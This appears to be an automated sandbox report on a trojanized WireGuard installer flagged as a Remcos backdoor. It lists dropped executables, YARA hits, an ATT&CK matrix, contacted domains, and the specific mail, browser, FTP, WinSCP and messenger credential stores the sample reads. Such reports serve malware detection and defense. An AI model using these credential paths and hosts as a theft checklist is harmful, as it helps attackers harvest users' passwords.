Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Code function: 3_2_013DAC70 GetUserNameW,

3_2_013DAC70

Source: C:\Users\user\Desktop\wireguard-pro.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 Blob

Jump to behavior

Source: wireguard.exe, 00000009.00000003.638144981.0000028D9BFAD000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638168424.0000028D9BFB7000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638104101.0000028D9BFAD000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638208577.0000028D9BFBA000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638158830.0000028D9BFB6000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638199616.0000028D9BFB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PGSETUP.EXE
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: wireguard.exe, 00000009.00000003.638144981.0000028D9BFAD000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638168424.0000028D9BFB7000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638104101.0000028D9BFAD000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638208577.0000028D9BFBA000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638158830.0000028D9BFB6000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638199616.0000028D9BFB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 123.exe

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Key opened: HKEY_CURRENT_USER\Software\Paltalk

Jump to behavior

Source: Yara match	File source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wireguard-pro.exe PID: 7080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HQL82NEF.exe PID: 5160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audddd.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	11 Peripheral Device Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 Windows Service	1 Windows Service	1 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	11 Registry Run Keys / Startup Folder	12 Process Injection	11 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	11 Registry Run Keys / Startup Folder	1 Software Packing	1 Credentials In Files	25 System Information Discovery	Distributed Component Object Model	1 Email Collection	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	221 Input Capture	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	121 Security Software Discovery	VNC	1 Clipboard Data	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	123 Masquerading	Proc Filesystem	31 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Hidden Files and Directories	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	1 System Network Configuration Discovery	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
wireguard-pro.exe	53%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
wireguard-pro.exe	100%	Avira	TR/Dropper.Gen2
wireguard-pro.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\audddd\audddd.exe	100%	Avira	LNK/Runner.VPGD
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	100%	Avira	LNK/Runner.VPGD
C:\Users\user\AppData\Roaming\audddd\audddd.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	100%	Joe Sandbox ML
C:\Program Files\WireGuard\wg.exe	0%	ReversingLabs
C:\Program Files\WireGuard\wireguard.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\tmpG47.tmp (copy)	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Roaming\audddd\audddd.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Windows\Installer\MSIC895.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC8E4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC944.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC9A4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC9E3.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIC9F4.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://ocsp.entrust.nethttp://crl.entrust.net/ts2ca.crl	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/g2ca.crl	0%	Avira URL Cloud	safe
http://DynDns.com	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crl0	0%	Avira URL Cloud	safe
https://www.wireguard.com/donations/key	0%	Avira URL Cloud	safe
https://www.wireguard.com/	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crlZ	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/WireGuard:	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/latest.sig	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl9	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crlO	0%	Avira URL Cloud	safe
http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/evcs2-chain.p7c	0%	Avira URL Cloud	safe
http://crl.entrust.ne	0%	Avira URL Cloud	safe
https://rakishev.net	0%	Avira URL Cloud	safe
http://ocsp.entrust.net01	0%	Avira URL Cloud	safe
http://ocsp.entrust.net02	0%	Avira URL Cloud	safe
http://ocsp.entrust.net00	0%	Avira URL Cloud	safe
http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/ts2-chain256.cer	0%	Avira URL Cloud	safe
http://ocsp.entrust.nett	0%	Avira URL Cloud	safe
https://rakishev.net/wp-cron.php	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://ocsp.entrust.netb	0%	Avira URL Cloud	safe
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl	0%	Avira URL Cloud	safe
https://www.wireguard.com/initSpan:	0%	Avira URL Cloud	safe
https://www.wireguard.com/D	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/latest.signcreasep	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/H	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/E	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/	0%	Avira URL Cloud	safe
https://download.wireguard.com/L8	0%	Avira URL Cloud	safe
http://no-ip.com	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msi	0%	Avira URL Cloud	safe
https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msioL	0%	Avira URL Cloud	safe
http://rakishev.net	0%	Avira URL Cloud	safe
http://crl.microsof	0%	Avira URL Cloud	safe
https://download.wireguard.com/	0%	Avira URL Cloud	safe
http://ocsp.entrust.netI	0%	Avira URL Cloud	safe
https://download.wireguard.com/v8	0%	Avira URL Cloud	safe
https://www.wireguard.net/D	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wireguard.com	136.144.57.121	true	false	unknown
rakishev.net	172.67.150.79	true	false	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
download.wireguard.com	unknown	unknown	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
ocsp.entrust.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://download.wireguard.com/windows-client/latest.sig	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://rakishev.net/wp-cron.php	false	Avira URL Cloud: safe	unknown
https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.entrust.net/g2ca.crl0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	false		high
https://www.wireguard.com/	wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, MSIC943.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crlZ	7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.nethttp://crl.entrust.net/g2ca.crl	7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.com	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net01	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts2-chain256.cer01	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.618947019.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr	false		high
http://ocsp.entrust.net00	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crl0	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/csbr1.crlZ	7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.nethttp://crl.entrust.net/ts2ca.crl	7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
